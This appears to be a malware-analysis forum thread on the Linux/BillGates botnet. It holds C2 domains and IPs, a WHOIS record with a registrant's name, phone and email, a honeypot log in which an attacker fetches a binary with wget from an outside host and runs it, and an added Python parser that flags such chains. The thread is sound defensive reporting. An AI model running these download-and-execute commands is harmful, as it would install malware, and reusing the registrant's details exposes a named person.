Linux/BillGates

Forum for analysis and discussion about malware.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Wed Sep 16, 2015 5:26 am

Thank you for your report on Linux/BillGates repository. Allow me to correct your analysis as per below:
sysopfb wrote: xdwl appears to be a UPX-packed version of BillGates.Lite that you wrote about on MMD?
1. xdwl is the Elknot-packed and stripped version, not BillGates.Lite; the CNC data is fine.
2. xdsy is BillGates with a hostname-based CNC (linux.xinhuamei.net); the CNC opens port number 12345:

Code:
;; QUESTION SECTION:
;linux.xinhuamei.net.           IN      A
;; ANSWER SECTION:
linux.xinhuamei.net.    120     IN      A       61.160.194.62
Additionally, sharing the panel screenshot so that other experts can evaluate the infection pace is recommended, if you are willing to share it, since these repository reports are used by some admins, abuse desks and authorities for cleanup or as evidence reference.
Due to the nature of the CNC info, we cannot say whether it is a hacked domain or a DDNS service; below is the responsible contact for this infection:

Code:
Domain name: xinhuamei.net
Registry Domain ID: 1918918222_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.bizcn.com
Registrar URL: http://www.bizcn.com
Updated Date: 2015-04-12T04:19:45Z
Creation Date: 2015-04-12T04:19:44Z
Registrar Registration Expiration Date: 2016-04-12T04:19:44Z
Registrar: Bizcn.com,Inc.
Registrar IANA ID: 471
Registrar Abuse Contact Email: abuse@bizcn.com
Registrar Abuse Contact Phone: +86.5922577888
Domain Status: clientDeleteProhibited (http://www.icann.org/epp#clientDeleteProhibited)
Domain Status: clientTransferProhibited (http://www.icann.org/epp#clientTransferProhibited)
Registry Registrant ID:
Registrant Name: Xiao Dan
Registrant Organization: Xiao Dan
Registrant Street: Henan Zhengzhou 887
Registrant City: ZhengZhou
Registrant State/Province: HeNan
Registrant Postal Code: 123456
Registrant Country: CN
Registrant Phone: +86.8731650734
Registrant Phone Ext:
Registrant Fax: +86.8731650734
Registrant Fax Ext:
Registrant Email: 664035800@qq.com
No matter how good we reverse, no PCAP = no case, so here it is:
#MalwareMustDie
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Sat Sep 19, 2015 8:59 am

An infection effort from 60.166.61.110

Code:
2015-09-18 10:35:54 [session=78,ip=60.166.61.110] wget -O /tmp/Kinwu.exe http://183.60.216.182:88/Kinwu.exe
2015-09-18 10:35:59 [session=78,ip=60.166.61.110] chmod 0755 /tmp/Kinwu.exe
2015-09-18 10:36:04 [session=78,ip=60.166.61.110] nohup /tmp/Kinwu.exe > /dev/null 2>&1 &
2015-09-18 10:36:09 [session=78,ip=60.166.61.110] /tmp/Kinwu.exe
2015-09-18 10:36:14 [session=78,ip=60.166.61.110] ./Kinwu.exe &
VT: https://www.virustotal.com/en/file/e43e ... /analysis/
Buggy, caused by a bad packer setting :lol:

Code:
$ ./Kinwu.exe
Segmentation fault
It looks like a bad packer setting made the packed ELF make a stupid call to 0x080626da (way out of bounds), which is causing the SEGFAULT.
Patch the ELF or reverse it properly to get the CNC below, or use "that" way.

Code:
mjg.f3322.org (222.186.34.220) port: 65535
I love it when those crooks get sloppy :P
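The honeypot session log quoted in the post above is a good input for automated triage. The following is an added example (not code from the poster or from MalwareMustDie) that parses lines in that `timestamp [session=N,ip=X] command` format, groups them per session, and flags the download -> chmod -> execute chain, pulling out the attacker IP, payload URL, download host and dropped path a responder would want to report. The sample log is constructed from the five lines shown in the post.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample: the five honeypot lines quoted in the post above.
SAMPLE_LOG = """\
2015-09-18 10:35:54 [session=78,ip=60.166.61.110] wget -O /tmp/Kinwu.exe http://183.60.216.182:88/Kinwu.exe
2015-09-18 10:35:59 [session=78,ip=60.166.61.110] chmod 0755 /tmp/Kinwu.exe
2015-09-18 10:36:04 [session=78,ip=60.166.61.110] nohup /tmp/Kinwu.exe > /dev/null 2>&1 &
2015-09-18 10:36:09 [session=78,ip=60.166.61.110] /tmp/Kinwu.exe
2015-09-18 10:36:14 [session=78,ip=60.166.61.110] ./Kinwu.exe &
"""

# Log line layout as shown in the post (assumed to be stable for this honeypot).
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"\[session=(?P<session>\d+),ip=(?P<ip>[\d.]+)\] (?P<cmd>.*)$"
)
WGET_RE = re.compile(r"\bwget\b.*?-O\s+(?P<path>\S+)\s+(?P<url>https?://\S+)")
CHMOD_RE = re.compile(r"\bchmod\b\s+\S+\s+(?P<path>\S+)")


def parse_log(text):
    """Return one dict (ts, session, ip, cmd) per well-formed log line."""
    return [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]


def find_dropper_chains(events):
    """Per (session, ip), track files fetched with wget -O and whether the same
    path was later chmod'ed or executed. Returns the chains worth reporting."""
    per_session = defaultdict(list)
    for ev in events:
        per_session[(ev["session"], ev["ip"])].append(ev)
    chains = []
    for (session, ip), evs in per_session.items():
        dropped = {}  # dropped path -> record of what happened to it
        for ev in evs:
            w = WGET_RE.search(ev["cmd"])
            if w:
                dropped[w["path"]] = {
                    "session": session, "attacker_ip": ip, "url": w["url"],
                    "download_host": urlparse(w["url"]).hostname,
                    "path": w["path"], "chmod": False, "executed": False}
                continue
            c = CHMOD_RE.search(ev["cmd"])
            if c and c["path"] in dropped:
                dropped[c["path"]]["chmod"] = True
                continue
            for path, rec in dropped.items():
                # Execution by full path, or by ./name after a cd into the directory.
                if path in ev["cmd"] or "./" + path.rsplit("/", 1)[-1] in ev["cmd"]:
                    rec["executed"] = True
        chains.extend(r for r in dropped.values() if r["chmod"] or r["executed"])
    return chains
```

The hostnames and paths it extracts are exactly what goes into an abuse report like the WHOIS one earlier in this thread.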
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Tue Oct 13, 2015 2:52 pm

Panel and CNC are at 180.97.215.131; the CNC is on a purpose-set-up domain, 51sf176.com, registered by 1043898868@qq.com.
Details: http://imgur.com/a/7LcuS
Sample: https://www.virustotal.com/en/file/9c8e ... 444746052/